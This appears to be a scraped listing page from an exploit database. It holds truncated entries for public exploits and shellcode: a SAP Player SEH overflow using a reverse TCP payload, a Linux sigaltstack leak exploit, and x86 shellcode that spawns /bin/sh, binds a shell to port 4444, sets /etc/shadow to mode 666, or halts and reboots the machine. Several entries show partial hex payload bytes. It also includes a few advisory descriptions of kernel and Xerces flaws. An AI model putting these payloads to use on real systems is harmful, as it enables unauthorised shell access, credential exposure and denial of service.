SAP Player 0.9 - '.pla' Universal Local Buffer Overflow (SEH)

!/usr/bin/python SAP player 0.9 .pla Universal Local BoF Exploit SEH Download: http://www.sorinara.com/sap/sap09.exe Credits go to: PLATEN Coded by: Steven Seeley aka mrme Tested on Windows XP SP3 Its not dead till its buried ; windows/shell/reversetcp - 617 bytes stage 1 http://www.metasploit.co...

kernel: information leak in sigaltstack

The dosigaltstack function in kernel/signal.c in Linux kernel 2.4 through 2.4.37 and 2.6 before 2.6.31-rc5, when running on 64-bit systems, does not clear certain padding bytes from a structure, which allows local users to obtain sensitive information from the kernel stack via the sigaltstack...

win32/xp sp3 (FR) Sleep 14 bytes

Exploit for win32 platform in category shellcode =============================== win32/xp sp3 FR Sleep 14 bytes =============================== / win32/xp sp3 FR Sleep 14 bytes Author : optix hacker notice Tested Under Windows XP SP3 fr this shellcode makes a sleep for 90000ms=90s=1,5min this is...

linux/x86 /bin/sh polymorphic shellcode 48 bytes

No description provided by source. / Title: Polymorphic Shellcode /bin/sh - 48 bytes Author: Jonathan Salwan Mail: submit ! shell-storm.org ! DataBase of shellcode : http://www.shell-storm.org/shellcode/ Original Informations ===================== Disassembly of section .text: 08048060 .text:...

Out-of-Bounds

Overview Affected versions of this package are vulnerable to Out-of-Bounds. Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service application crash via vectors involving nested...

linux/x86 /bin/sh polymorphic shellcode 48 bytes

Exploit for linux/x86 platform in category shellcode ================================================ linux/x86 /bin/sh polymorphic shellcode 48 bytes ================================================ / Title: Polymorphic Shellcode /bin/sh - 48 bytes Author: Jonathan Salwan Original Informations...

Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit

Exploit for linux platform in category local exploits ====================================================================== Linux Kernel include include include include include include include include const int randcalls = 0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 13, 14, 16, 21, 22, 24, 25, 32, 33, 36...

Cisco IOS BGP DoS

Few denial of service conditions on BGP updates with 4-bytes AS numbers...

Millenium MP3 Studio 1.0 .mpf File Local Stack Overflow Exploit #2

Exploit for unknown platform in category local exploits ================================================================== Millenium MP3 Studio 1.0 .mpf File Local Stack Overflow Exploit 2 ================================================================== + Vulnerability : .mpf File Local Stack...

win32/xp sp2 (En) cmd.exe 23 bytes

No description provided by source. / win32/xp sp2 En cmd.exe 23 bytes Author : Mountassif Moad A.K.A : Stack Description : It's a 23 Byte Shellcode which Execute Cmd.exe Tested Under Windows Xp SP2 En get the following if we disassemle this code compiled with olly debugger 00402000 8BEC MOV EBP,E...

win32/xp sp2 En cmd.exe 23 bytes

win32/xp sp2 En cmd.exe 23 bytes. Shellcode exploit for win32 platform / win32/xp sp2 En cmd.exe 23 bytes Author : Mountassif Moad A.K.A : Stack Description : It's a 23 Byte Shellcode which Execute Cmd.exe Tested Under Windows Xp SP2 En get the following if we disassemle this code compiled with...

Linux/x86 - execve(/sbin/shutdown,/sbin/shutdown 0) Shellcode (36 bytes)

Linux/x86 - execve/sbin/shutdown,/sbin/shutdown 0 Shellcode 36 bytes. Shellcode exploit for Linuxx86 platform include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x64\x6f\x77\x6e" // push $0x6e776f64 "\x68\x73\x68\x75\x74" // push...

Linux/x86 - execve(/sbin/reboot,/sbin/reboot) Shellcode (28 bytes)

Linux/x86 - execve/sbin/reboot,/sbin/reboot Shellcode 28 bytes. Shellcode exploit for Linuxx86 platform include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x62\x6f\x6f\x74" // push $0x746f6f62 "\x68\x6e\x2f\x72\x65" // push $0x65722f6e...

Linux/x86 - execve(/sbin/halt,/sbin/halt) Shellcode (27 bytes)

Linux/x86 - execve/sbin/halt,/sbin/halt Shellcode 27 bytes. Shellcode exploit for Linuxx86 platform include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x66\x68\x6c\x74" // pushw $0x746c "\x68\x6e\x2f\x68\x61" // push $0x61682f6e...

linux/x86 Port Binding Shellcode (xor-encoded) 152 bytes

Exploit for linux/x86 platform in category shellcode ======================================================== Linux/x86 Port Binding Shellcode xor-encoded 152 bytes ======================================================== / Author: Rick OS: Linux/x86 Description: Port Bind 4444 xor-encoded...

Linux/x86 - Disable Shadowing Shellcode (42 bytes)

Linux/x86 - Disable Shadowing Shellcode 42 bytes. Shellcode exploit for Linuxx86 platform include const char sc= "\x31\xdb" //xor ebx,ebx "\x8d\x43\x17" //LEA eax,ebx + 0x17 /LEA is FASTER than push and pop! "\x99" //cdq "\xcd\x80" //int 80 //setuid0 shouldn't returns -1 right? ; "\xb0\x0b" //mov...

linux/x86 Shellcode Polymorphic chmod("/etc/shadow",666) 54 bytes

Exploit for linux/x86 platform in category shellcode ================================================================= linux/x86 Shellcode Polymorphic chmod"/etc/shadow",666 54 bytes ================================================================= / Title : Linux/x86 - Shellcode Polymorphic...

linux/x86 Shellcode Polymorphic chmod"/etc/shadow",666 54 bytes

linux/x86 Shellcode Polymorphic chmod"/etc/shadow",666 54 bytes. Shellcode exploit for linx86 platform / Title : Linux/x86 - Shellcode Polymorphic chmod"/etc/shadow",666 & exit - 54 bytes Encode : ADD Author : Jonathan Salwan Mail : submit ! shell-storm.org ! Database of shellcodes =...

linux/x86 setreuid(geteuid(),geteuid()),execve(&quot;/bin/sh&quot;,0,0) 34 bytes

No description provided by source. / linux/x86 setreuidgeteuid,geteuid,execve"/bin/sh",0,0 34byte universal shellcode blue9057 [email protected] / int main char shellcode="\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46" "\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68"...

linux/x86 setreuid(geteuid() geteuid()) execve(&quot;&quot;/bin/sh&quot;&quot; 0 0) 34 bytes

No description provided by source. / linux/x86 setreuidgeteuid,geteuid,execve"/bin/sh",0,0 34byte universal shellcode blue9057 [email protected] / int main char shellcode="\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46" "\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68"...